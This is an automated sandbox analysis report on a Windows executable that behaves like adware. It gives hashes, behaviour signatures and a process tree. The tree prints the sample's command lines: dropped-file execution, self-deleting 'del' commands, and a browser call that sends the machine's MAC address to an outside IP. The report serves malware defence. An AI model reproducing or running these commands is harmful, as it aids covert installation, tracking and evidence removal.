Analysis
-
max time kernel
179s -
max time network
194s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
05/12/2022, 10:51
Static task
static1
Behavioral task
behavioral1
Sample
9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe
Resource
win10v2004-20221111-en
General
-
Target
9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe
-
Size
50KB
-
MD5
10e1a137110947fc22c8b4922b007006
-
SHA1
60f588d712f15ba21983395f2725344de7e058bb
-
SHA256
9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c
-
SHA512
995381f1cafe9caced7230aba0ebe0f593fec8b2ac99a0003327371b010fa62540d726d415b2ee41fca7d3659069e2a6599e79b30e9e877f82084b648e276c10
-
SSDEEP
768:itGgxXiFXYbgCRDBbDnDfHfRSF8IiDrmIihGVVu6YgxfLmneqvdvLAwF:kGglbgUBvjyr3hGVVu6YyTwhBF
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3676 ins13E6.tmp -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation ins13E6.tmp -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Lenovo\inchar32.dat 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File opened for modification C:\Windows\fxsst.dll 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{FD8AC3F6-77E0-11ED-BF5F-4EF50EB22100} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0f47cd9ed0bd901 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3648690933" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3648690933" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3648690933" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3648690933" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000eef4ddb70fa9964f8bf69d510f57c1eb00000000020000000000106600000001000020000000296effaf927e8635e8d25dd0415286707d5b934b20e25e79f6d95cb6efc75c13000000000e80000000020000200000009b712587e79bf8ce0d544470a82678282bb874a27fe3f31e8ec06b66bb071d27200000002e0806bcf6c8e2448d267e3a62d60a5221e3411fc3e8e85e451a1ac5a46e4130400000002ecd760ec58035b7d22348c242666cb31b15abfac477b726c8d376f8ba2fcb135a662b0e11f9526eb30dbd74ad1798f07fad9e4109721514eb9d1cb383d1d13f iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000eef4ddb70fa9964f8bf69d510f57c1eb000000000200000000001066000000010000200000007ba1594471d82ff8130c8eac53af93ee62705087c0d0659adf89d33640238f46000000000e80000000020000200000002e07b5931af11d66f0e8dabeb609110b5824c57fabd01ebb42872be6b83e319b2000000013fd5da992ae2e37086c292db9113c3a22a8c97a45a252f16f7f0b8540ddd2fb4000000043a677ebd71a8aa1e94be69e5817a780f865c98bdc0c74953a8a57d60cbbf4cf2e0247d2e4a1a8c1e99d649decf572633e0501fdcc3c525b5cf3d0ae0a89080b iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{FD8D2803-77E0-11ED-BF5F-4EF50EB22100} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31001581" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3648690933" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31001581" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "377369387" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000eef4ddb70fa9964f8bf69d510f57c1eb000000000200000000001066000000010000200000006798e29669067064c6c5b854dec827ec6388ecd2c0bd11166f59fd04f5cbbe2a000000000e8000000002000020000000d6d6a5355993758a5fbc0a360f1c505974b7cba575ace0003ce75375989b086b200000003aefbf7175b1ec09d59c371215269240f15d13e96bad6c1b0024d740b53555af4000000081b4fa6d3c927125c37b16289afbc51ac816b927378e9e15565111225f4a51693b8f027d0cb3a8614b3d7337f9d57c7677e5e9b111ef65352543cbd6c6d957fe iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31001581" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31001581" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0f47cd9ed0bd901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3648690933" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31001581" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeIncBasePriorityPrivilege 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe Token: SeIncBasePriorityPrivilege 3676 ins13E6.tmp -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3508 iexplore.exe 2704 iexplore.exe 3164 iexplore.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 3164 iexplore.exe 3164 iexplore.exe 2704 iexplore.exe 2704 iexplore.exe 3508 iexplore.exe 3508 iexplore.exe 780 IEXPLORE.EXE 780 IEXPLORE.EXE 4864 IEXPLORE.EXE 4864 IEXPLORE.EXE 2436 IEXPLORE.EXE 2436 IEXPLORE.EXE 4864 IEXPLORE.EXE 4864 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2096 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 83 PID 2180 wrote to memory of 2096 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 83 PID 2180 wrote to memory of 2096 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 83 PID 2180 wrote to memory of 4220 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 85 PID 2180 wrote to memory of 4220 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 85 PID 2180 wrote to memory of 4220 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 85 PID 2180 wrote to memory of 4172 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 86 PID 2180 wrote to memory of 4172 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 86 PID 2180 wrote to memory of 4172 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 86 PID 2180 wrote to memory of 2704 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 89 PID 2180 wrote to memory of 2704 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 89 PID 2180 wrote to memory of 3508 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 90 PID 2180 wrote to memory of 3508 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 90 PID 2180 wrote to memory of 3164 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 91 PID 2180 wrote to memory of 3164 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 91 PID 2180 wrote to memory of 3992 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 92 PID 2180 wrote to memory of 3992 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 92 PID 2180 wrote to memory of 3992 2180 9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe 92 PID 4172 wrote to memory of 3848 4172 cmd.exe 93 PID 4172 wrote to memory of 3848 4172 cmd.exe 93 PID 4172 wrote to memory of 3848 4172 cmd.exe 93 PID 4220 wrote to memory of 3548 4220 cmd.exe 94 PID 4220 wrote to memory of 3548 4220 cmd.exe 94 PID 4220 wrote to memory of 3548 4220 cmd.exe 94 PID 2096 wrote to memory of 3676 2096 cmd.exe 96 PID 2096 wrote to memory of 3676 2096 cmd.exe 96 PID 2096 wrote to memory of 3676 2096 cmd.exe 96 PID 3508 wrote to memory of 2436 3508 iexplore.exe 100 PID 3508 wrote to memory of 2436 3508 iexplore.exe 100 PID 3508 wrote to memory of 2436 3508 iexplore.exe 100 PID 3164 wrote to memory of 780 3164 iexplore.exe 98 PID 3164 wrote to memory of 780 3164 iexplore.exe 98 PID 3164 wrote to memory of 780 3164 iexplore.exe 98 PID 2704 wrote to memory of 4864 2704 iexplore.exe 99 PID 2704 wrote to memory of 4864 2704 iexplore.exe 99 PID 2704 wrote to memory of 4864 2704 iexplore.exe 99 PID 3676 wrote to memory of 1396 3676 ins13E6.tmp 113 PID 3676 wrote to memory of 1396 3676 ins13E6.tmp 113 PID 3676 wrote to memory of 1396 3676 ins13E6.tmp 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe"C:\Users\Admin\AppData\Local\Temp\9f1b3d95f95512eb8a7d526ebd9b54cb40e7daa1f833c6a656dc0aba4668a13c.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\run_dws_file.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\ins13E6.tmpC:\Users\Admin\AppData\Local\Temp\ins13E6.tmp linkp_gverych.tmp3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\ins13E6.tmp > nul4⤵PID:1396
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp_ext_favurl_cab.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\SysWOW64\expand.exeexpand.exe "C:\Users\Admin\AppData\Local\Temp\favorites_url.cab" -F:*.* "C:\Users\Admin\Favorites"3⤵
- Drops file in Windows directory
PID:3548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp_ext_deskurl_cab.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\SysWOW64\expand.exeexpand.exe "C:\Users\Admin\AppData\Local\Temp\desktop_url.cab" -F:*.* "C:\Users\Admin\Desktop"3⤵
- Drops file in Windows directory
PID:3848
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://121.14.155.219:9091/report3.ashx?m=4E-F5-0E-B2-21-00&mid=21663&tid=1&d=cc7ea818f3eb454c74b0ad53ae45b456&uid=13729&t=2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2704 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4864
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://tc.58816.com/2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3508 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2436
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.38522.com/bhy.html?popup2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3164 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:780
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\9F1B3D~1.EXE > nul2⤵PID:3992
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FD8AC3F6-77E0-11ED-BF5F-4EF50EB22100}.dat
Filesize5KB
MD5f953601d0d232f9515230ee9e8d2dc79
SHA13ba750970b9d4f2d486222405f992281d84e538d
SHA256c32bfd5bca43ab1af6534447d1a2868583d34aa1b53ba25b995d20daaa356eb3
SHA512bc2ace15b97614af7741bd6687d33a75b2814480131b1d58f86245bfd33ce928493f432e6ddf5bb3ab63e7f4c6c91b43e16fd568ae3d7fdf0993a1871e34559a
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FD8D00F3-77E0-11ED-BF5F-4EF50EB22100}.dat
Filesize5KB
MD5a798d9348b826b3620afd535af8a9a8b
SHA1cf6b4d7459fa1a36cc26e9e960f8bc23e0a03f6d
SHA25693064c92ef47ae2a0586d4584019462136778072ab3b847a540c44707a56e0f8
SHA512993c7bde3ae80a0b7805eb7a6203bd75975c60c6260e7d7a40aefa49fc6e2fadd8aa8ce5f3b3d41c23df5317efb302df4d2cc0f91b4203eb0bc789689ba31fb1
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FD8D2803-77E0-11ED-BF5F-4EF50EB22100}.dat
Filesize5KB
MD5872c2db922f6e5abc48c2411d4b25482
SHA1ebbb3d9dfa70c90bf25d766f65f56d29e2d1b82b
SHA25614edd86c19bee82921ac32a69f8ffe017683e19d7ec54a1201a96900c978bb2e
SHA512a85fe7314b4c7220d14d30cc5ff35eae313b5839d67e95e7ab0215d5abff9430618e4c67f6d9130d16ff9837d3c167750caa2c9374f020e0f511df0db4a9ce10
-
Filesize
57.2MB
MD594138c6b753877201f5f64aeed79618e
SHA190e57463c3b2985f7f9f927e991f8004402ad74a
SHA256d101de7e9b1f6ba068064850f2b60508e4dbf304f533c5069228318d024d78de
SHA5124f9eecbaccd487387a458757291efcd6f9d0500cef7fc2959dd785a26f567c083e43e2d15fea5af7c91bb1ad897f6b1889ee023521a70784ecfd0ef4175f98f4
-
Filesize
57.2MB
MD594138c6b753877201f5f64aeed79618e
SHA190e57463c3b2985f7f9f927e991f8004402ad74a
SHA256d101de7e9b1f6ba068064850f2b60508e4dbf304f533c5069228318d024d78de
SHA5124f9eecbaccd487387a458757291efcd6f9d0500cef7fc2959dd785a26f567c083e43e2d15fea5af7c91bb1ad897f6b1889ee023521a70784ecfd0ef4175f98f4
-
Filesize
706B
MD543a67a3601797b487041c505bc77969e
SHA101e3c2a53271efd585045c7de9e012b37c18dcef
SHA256771a33ad0d463ed7444d424e73e16d4c9b63513ed9d3a9a53e8dbb8c4d050569
SHA512f8f4b7c5640e366449f0d6594622e9323ba22a30be7e8594beb9fc6fbe8a2e01f68aca008e088ce10e36ad33c19562e8ec45fc2107db352220b1eef8f7d21f55
-
Filesize
63B
MD53e17df8d308157e1b4455725ec513e72
SHA1a51c8a3e064e0fb61fff5b52eb6b0bdc270ce12a
SHA256fa7e201c9309bfc0bebfa074a2cb6e42b084866fd6726a9fc15de076a33a7492
SHA51290d408932628982bc1516b9a196bc5cfdb7041aa1fdba2b188974b9381c9f28ecb7d828d88692d65b610db730a008b5493088830fb86201e676f325ff73e26a9
-
Filesize
94B
MD5d5fc3a9ec15a6302543438928c29e284
SHA1fd4199e543f683a8830a88f8ac0d0f001952b506
SHA256b2160315eb2f3bcb2e7601e0ce7fbb4ed72094b891d3db3b5119b07eeccc568d
SHA5124d0378480f1e7d5bee5cf8f8cd3495745c05408785ab687b92be739cd64c077f0e3ee26d6d96e27eb6e2c3dec5f39a2766c45854dc2d6a5b6defc672aeafa0f9
-
Filesize
98B
MD58663de6fce9208b795dc913d1a6a3f5b
SHA1882193f208cf012eaf22eeaa4fef3b67e7c67c15
SHA2562909ea8555f2fc19097c1070a1da8fcfd6dc6886aa1d99d7e0c05e53feeb5b61
SHA5129381063e0f85e874be54ae22675393b82c6ab54b223090148e4acbeff6f22393c96c90b83d6538461b695528af01d1f1231cf5dc719f07d6168386974b490688
-
Filesize
154B
MD58d681a59ea75e91f730bd9ce3c42e514
SHA19d426029daeebf03c9053761e0e5a9f447f98e9c
SHA256afd3d42faa66d6703a32f2f5b41e0d679dd8210aacb284d1e46854207087cac7
SHA512ffece212187fb127e98a612a59e7f2df7e9ebc6fee600644e2eef80d62fcc7d411ffba435b48981c4d75ba0ca34f85ff57091f4098104651710220a28a13ba8d
-
Filesize
155B
MD55a17106c27138df10448c2c3be95f399
SHA156acc2ed4fea4171127a13dcdee08bdd39d674d6
SHA256c544ab13bd785ea3d5792873dedb102e87ea9a3b28fb1283be2eaac363ce360c
SHA5121d8839f36323dfb4458745dbf31a98bc676121db3e4ccda59ca8e177437c85a5811125119fbfa3b5bcde6c2fbf25ae910109e785e276c32fbfebe6437aea8198
-
Filesize
156B
MD58a275b261afcc166671132b6f03831e4
SHA103ac21edc1de2df748ee3a301a6b3de989c423c3
SHA2560296e167f4cfe36275cf1a705a6c56b30b15c0712ec5904b4ed3299f07beee8e
